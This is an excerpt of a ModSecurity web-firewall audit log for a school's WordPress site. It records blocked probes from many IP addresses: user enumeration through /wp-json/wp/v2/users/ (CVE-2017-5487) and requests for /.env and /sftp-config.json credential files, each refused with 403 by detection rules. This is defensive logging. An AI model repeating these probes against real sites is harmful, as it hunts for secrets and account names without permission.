(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746609740046943 2792 (- - -) Stopwatch2: 1746609740046943 2792; combined=1246, p1=435, p2=782, p3=0, p4=0, p5=29, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3de0f49-Z-- --1addb974-A-- [07/May/2025:16:34:37 +0700] aBspLW3ZWOH0zu5xiSSmvwAAAMQ 103.236.140.4 37970 103.236.140.4 8181 --1addb974-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.254.241.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.254.241.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1addb974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1addb974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746610477528658 2774 (- - -) Stopwatch2: 1746610477528658 2774; combined=1234, p1=422, p2=783, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1addb974-Z-- --89060f06-A-- [07/May/2025:16:58:05 +0700] aBsurUkjCPYF0_E6F_IyiAAAAI4 103.236.140.4 38330 103.236.140.4 8181 --89060f06-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.224.170.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.224.170.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --89060f06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89060f06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746611885563493 2803 (- - -) Stopwatch2: 1746611885563493 2803; combined=1179, p1=399, p2=754, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89060f06-Z-- --5373d835-A-- [07/May/2025:17:02:21 +0700] aBsvrV2wLCWKKTe5QCHQhAAAAFI 103.236.140.4 38344 103.236.140.4 8181 --5373d835-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 163.47.203.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 163.47.203.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5373d835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5373d835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746612141374378 2710 (- - -) Stopwatch2: 1746612141374378 2710; combined=1255, p1=376, p2=846, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5373d835-Z-- --0786297f-A-- [07/May/2025:18:23:28 +0700] aBtCsIyiPdJj1JUH57qKWgAAAAQ 103.236.140.4 38826 103.236.140.4 8181 --0786297f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6 Accept-Charset: utf-8 --0786297f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0786297f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746617008073680 914 (- - -) Stopwatch2: 1746617008073680 914; combined=354, p1=309, p2=0, p3=0, p4=0, p5=45, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0786297f-Z-- --a6779c4a-A-- [07/May/2025:18:43:21 +0700] aBtHWW3ZWOH0zu5xiSSnCgAAAM4 103.236.140.4 38944 103.236.140.4 8181 --a6779c4a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.12.226.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.12.226.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a6779c4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6779c4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746618201766437 3405 (- - -) Stopwatch2: 1746618201766437 3405; combined=1521, p1=485, p2=1003, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6779c4a-Z-- --58ec2b17-A-- [07/May/2025:19:12:41 +0700] aBtOOW3ZWOH0zu5xiSSnHAAAANM 103.236.140.4 39178 103.236.140.4 8181 --58ec2b17-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.140.12.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.140.12.53 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --58ec2b17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58ec2b17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746619961701130 970 (- - -) Stopwatch2: 1746619961701130 970; combined=386, p1=349, p2=0, p3=0, p4=0, p5=37, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58ec2b17-Z-- --219c1457-A-- [07/May/2025:19:29:57 +0700] aBtSRW3ZWOH0zu5xiSSnKAAAANM 103.236.140.4 39266 103.236.140.4 8181 --219c1457-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.235.185.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.235.185.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --219c1457-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --219c1457-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746620997292906 3186 (- - -) Stopwatch2: 1746620997292906 3186; combined=1354, p1=495, p2=830, p3=0, p4=0, p5=29, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --219c1457-Z-- --422e2c2a-A-- [07/May/2025:19:36:43 +0700] aBtT223ZWOH0zu5xiSSnKwAAANQ 103.236.140.4 39292 103.236.140.4 8181 --422e2c2a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.179.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.179.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --422e2c2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --422e2c2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746621403775881 863 (- - -) Stopwatch2: 1746621403775881 863; combined=363, p1=320, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --422e2c2a-Z-- --faef2902-A-- [07/May/2025:20:00:43 +0700] aBtZe12wLCWKKTe5QCHRrgAAAFM 103.236.140.4 41426 103.236.140.4 8181 --faef2902-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.50.220.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.50.220.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --faef2902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faef2902-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746622843307643 2953 (- - -) Stopwatch2: 1746622843307643 2953; combined=1302, p1=458, p2=814, p3=0, p4=0, p5=30, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faef2902-Z-- --8dae0b58-A-- [07/May/2025:20:08:30 +0700] aBtbTkkjCPYF0_E6F_Iz7QAAAI8 103.236.140.4 45472 103.236.140.4 8181 --8dae0b58-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.151.206.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.151.206.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8dae0b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dae0b58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746623310178730 2506 (- - -) Stopwatch2: 1746623310178730 2506; combined=1189, p1=374, p2=787, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dae0b58-Z-- --a4ae905a-A-- [07/May/2025:21:03:27 +0700] aBtoL4yiPdJj1JUH57qMAAAAAAI 103.236.140.4 45856 103.236.140.4 8181 --a4ae905a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 82.165.249.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.165.249.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a4ae905a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4ae905a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746626607043223 2546 (- - -) Stopwatch2: 1746626607043223 2546; combined=1314, p1=448, p2=833, p3=0, p4=0, p5=33, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4ae905a-Z-- --b13a1d7c-A-- [07/May/2025:21:08:57 +0700] aBtpeYyiPdJj1JUH57qMBQAAAA8 103.236.140.4 45898 103.236.140.4 8181 --b13a1d7c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.143.101.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.143.101.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b13a1d7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b13a1d7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746626937161208 2846 (- - -) Stopwatch2: 1746626937161208 2846; combined=1228, p1=417, p2=782, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b13a1d7c-Z-- --c1278924-A-- [07/May/2025:21:28:40 +0700] aBtuGF2wLCWKKTe5QCHTEAAAAEc 103.236.140.4 46042 103.236.140.4 8181 --c1278924-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.212.139.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.212.139.224 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c1278924-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1278924-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746628120846192 2835 (- - -) Stopwatch2: 1746628120846192 2835; combined=1232, p1=422, p2=780, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1278924-Z-- --7060aa75-A-- [07/May/2025:21:51:36 +0700] aBtzeF2wLCWKKTe5QCHTIQAAAEo 103.236.140.4 46158 103.236.140.4 8181 --7060aa75-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate) Accept-Charset: utf-8 --7060aa75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7060aa75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746629496104460 883 (- - -) Stopwatch2: 1746629496104460 883; combined=365, p1=320, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7060aa75-Z-- --e6c72578-A-- [07/May/2025:21:55:38 +0700] aBt0am3ZWOH0zu5xiSSo4QAAANM 103.236.140.4 46198 103.236.140.4 8181 --e6c72578-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.79.176.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.79.176.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e6c72578-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6c72578-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746629738190778 2510 (- - -) Stopwatch2: 1746629738190778 2510; combined=1130, p1=354, p2=740, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6c72578-Z-- --688de409-A-- [07/May/2025:22:29:37 +0700] aBt8YUkjCPYF0_E6F_I33QAAAJc 103.236.140.4 35518 103.236.140.4 8181 --688de409-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.155.185 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.155.185 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --688de409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --688de409-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746631777795309 892 (- - -) Stopwatch2: 1746631777795309 892; combined=366, p1=321, p2=0, p3=0, p4=0, p5=45, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --688de409-Z-- --d49ae25f-A-- [07/May/2025:23:22:08 +0700] aBuIsEkjCPYF0_E6F_I38wAAAIQ 103.236.140.4 35786 103.236.140.4 8181 --d49ae25f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonT68/R201A Accept-Charset: utf-8 --d49ae25f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d49ae25f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746634928807644 851 (- - -) Stopwatch2: 1746634928807644 851; combined=340, p1=295, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d49ae25f-Z-- --17361577-A-- [07/May/2025:23:51:39 +0700] aBuPm12wLCWKKTe5QCHb7QAAAEA 103.236.140.4 53884 103.236.140.4 8181 --17361577-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.231.89.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.231.89.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --17361577-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17361577-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 